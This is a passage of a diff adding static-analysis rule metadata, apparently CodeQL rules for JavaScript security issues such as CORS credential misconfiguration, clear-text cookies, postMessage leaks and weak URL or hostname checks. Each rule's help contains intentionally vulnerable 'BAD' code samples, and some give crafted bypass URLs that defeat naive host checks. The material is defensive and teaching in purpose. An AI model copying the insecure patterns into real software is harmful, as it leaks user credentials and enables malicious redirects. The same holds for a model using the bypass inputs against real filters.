+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. 
The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: 
[CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n", + "markdown" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. 
The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: 
[CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-346", "external/cwe/cwe-639", "external/cwe/cwe-942" ], + "description" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials.", + "id" : "js/cors-misconfiguration-for-credentials", + "kind" : "path-problem", + "name" : "CORS misconfiguration for credentials transfer", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/functionality-from-untrusted-source", + "name" : "js/functionality-from-untrusted-source", + "shortDescription" : { + "text" : "Inclusion of functionality from an untrusted source" + }, + "fullDescription" : { + "text" : "Including functionality from an untrusted source may allow an attacker to control the functionality and execute arbitrary code." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. 
When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n", + "markdown" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. 
When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). 
Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-830" ], + "description" : "Including functionality from an untrusted source may allow\n an attacker to control the functionality and execute arbitrary code.", + "id" : "js/functionality-from-untrusted-source", + "kind" : "problem", + "name" : "Inclusion of functionality from an untrusted source", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.0" + } + }, { + "id" : "js/clear-text-cookie", + "name" : "js/clear-text-cookie", + "shortDescription" : { + "text" : "Clear text transmission of sensitive cookie" + }, + "fullDescription" : { + "text" : "Sending sensitive information in a cookie without requring SSL encryption can expose the cookie to an attacker." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n", + "markdown" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-614", "external/cwe/cwe-311", "external/cwe/cwe-312", "external/cwe/cwe-319" ], + "description" : "Sending sensitive information in a cookie without requring SSL encryption\n can expose the cookie to an attacker.", + "id" : "js/clear-text-cookie", + "kind" : "problem", + "name" : "Clear text transmission of sensitive cookie", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/cross-window-information-leak", + "name" : "js/cross-window-information-leak", + "shortDescription" : { + "text" : "Cross-window communication with unrestricted target origin" + }, + "fullDescription" : { + "text" : "When sending sensitive information to another window using `postMessage`, the origin of the target window should be restricted to avoid unintentional information leaks." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. 
If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", + "markdown" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. 
If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-201", "external/cwe/cwe-359" ], + "description" : "When sending sensitive information to another window using `postMessage`,\n the origin of the target window should be restricted to avoid unintentional\n information leaks.", + "id" : "js/cross-window-information-leak", + "kind" : "path-problem", + "name" : "Cross-window communication with unrestricted target origin", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "4.3" + } + }, { + "id" : "js/incomplete-url-substring-sanitization", + "name" : "js/incomplete-url-substring-sanitization", + "shortDescription" : { + "text" : "Incomplete URL substring sanitization" + }, + "fullDescription" : { + "text" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. 
Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. 
Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. 
Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. 
Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing.", + "id" : "js/incomplete-url-substring-sanitization", + "kind" : "problem", + "name" : "Incomplete URL substring sanitization", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/incomplete-hostname-regexp", + "name" : "js/incomplete-hostname-regexp", + "shortDescription" : { + "text" : "Incomplete regular expression for hostnames" + }, + "fullDescription" : { + "text" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. 
Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. 
Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part 
of the hostname might match more hostnames than expected.", + "id" : "js/incomplete-hostname-regexp", + "kind" : "problem", + "name" : "Incomplete regular expression for hostnames", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/incorrect-suffix-check", + "name" : "js/incorrect-suffix-check", + "shortDescription" : { + "text" : "Incorrect suffix check" + }, + "fullDescription" : { + "text" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. 
This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. 
